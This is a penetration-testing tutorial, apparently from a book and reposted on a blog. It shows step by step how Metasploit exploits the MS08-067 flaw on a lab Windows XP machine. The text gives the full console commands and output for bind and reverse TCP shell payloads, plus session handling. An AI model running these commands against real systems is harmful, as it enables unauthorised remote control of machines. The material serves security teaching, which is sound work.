Using the Metasploit Console to Launch Exploits
Our first Metasploit demo involves exploiting the MS08-067 Windows XP vulnerability that led to the Conficker superworm of late 2008–early 2009. We’ll use Metasploit to get a remote command shell running on the unpatched Windows XP machine. Metasploit can pair any Windows exploit with any Windows payload. So, we can choose the MS08-067 vulnerability to open a command shell, create an administrator, start a remote VNC session, or do a bunch of other stuff discussed later in the chapter. Let’s get started.
$ ./msfconsole 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ metasploit v3.4.0-dev [core:3.4 api:1.0] + -- --=[ 317 exploits - 93 auxiliary + -- --=[ 216 payloads - 20 encoders - 6 nops =[ svn r9114 updated today (2010.04.20) msf >
The interesting commands to start with are
show <exploits | payloads> info <exploit | payload> <name> use <exploit-name>
You’ll find all the other commands by typing help or ?. To launch an MS08-067 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:
msf > search ms08-067 [*] Searching loaded modules for pattern 'ms08-067'… Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption
The Metasploit name for this exploit is windows/smb/ms08_067_netapi. We’ll use that exploit and then go looking for all the options needed to make the exploit work:
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command:
msf exploit(ms08_067_netapi) > back msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:
msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6 RHOST => 192.168.1.6
As you can see, the syntax to set an option is as follows:
set <OPTION-NAME> <option>
Note
Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase. |
With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port:
msf exploit(ms08_067_netapi) > search "Windows Command Shell" [*] Searching loaded modules for pattern 'Windows Command Shell'… Compatible Payloads =================== Name Rank Description ---- ---- ----------- windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6) windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX Support) windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX Support) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS) windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows command shell. Some open a listener on the host, some cause the host to “phone home” to the attacking workstation, some use IPv6, some set up the command shell in one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”). One even connects back to the attacker tunneled over DNS. This Windows XP target virtual machine does not have a firewall enabled, so we’ll use a simple windows/shell/bind_tcp exploit:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
If the target were running a firewall, we might instead choose a payload that would cause the compromised workstation to connect back to the attacker (“reverse”):
msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.6 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST 192.168.1.6 no The target address
By default, this exploit will open a listener on tcp port4444, allowing us to connect for the command shell. Let’s attempt the exploit:
msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target… [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability… [*] Sending stage (240 bytes) to 192.168.1.6 [*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>echo w00t! echo w00t! w00t!
It worked! We can verify the connection by issuing the netstat command from the Windows XP machine console, looking for established connections on port 4444:
C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED TCP 192.168.1.6:4444 192.168.1.4:49623 ESTABLISHED 964
Referring back to the Metasploit output, the exploit attempt originated from 192.168.1.4:49623, matching the output we see in netstat. Let’s try a different payload. Press CTRL-Z to put this session into the background:
C:\>^Z Background session 1? [y/N] y msf exploit(ms08_067_netapi) >
Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.6 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port
This payload requires an additional option, LHOST. The victim needs to know to which host to connect when the exploit is successful.
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.4 LHOST => 192.168.1.4 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.4:4444 [*] Automatically detecting the target… [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability… [*] Sending stage (240 bytes) to 192.168.1.6 [*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180) (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>echo w00t! echo w00t! w00t!
Notice that this is “session 2.” Press CTRL-Z to put this session in the background and go back to the Metasploit prompt. Then, issue the command sessions –l to list all active sessions:
Background session 2? [y/N] y msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell 192.168.1.4:49623 -> 192.168.1.6:4444 2 shell Microsoft Windows XP [Version 5.1.2600] 192.168.1.4:4444 -> 192.168.1.6:1180
It’s easy to bounce back and forth between these two sessions. Just use the sessions –i <session>. If you don’t get a prompt immediately, try pressing ENTER.
msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1… C:\>^Z Background session 1? [y/N] y msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2… C:\WINDOWS\system32>
You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we’ll explore other ways to use Metasploit in the penetration testing process.
'Hacking' 카테고리의 다른 글
Steganography Technologies (0) | 2011.09.13 |
---|---|
To Catch An APT (0) | 2011.09.10 |
Conducting an Insider Attack (0) | 2011.09.08 |
"Apache Killer" a DDoS using the Range HTTP Header (0) | 2011.09.07 |
SYN Flooding 공격이란? (1) | 2011.08.31 |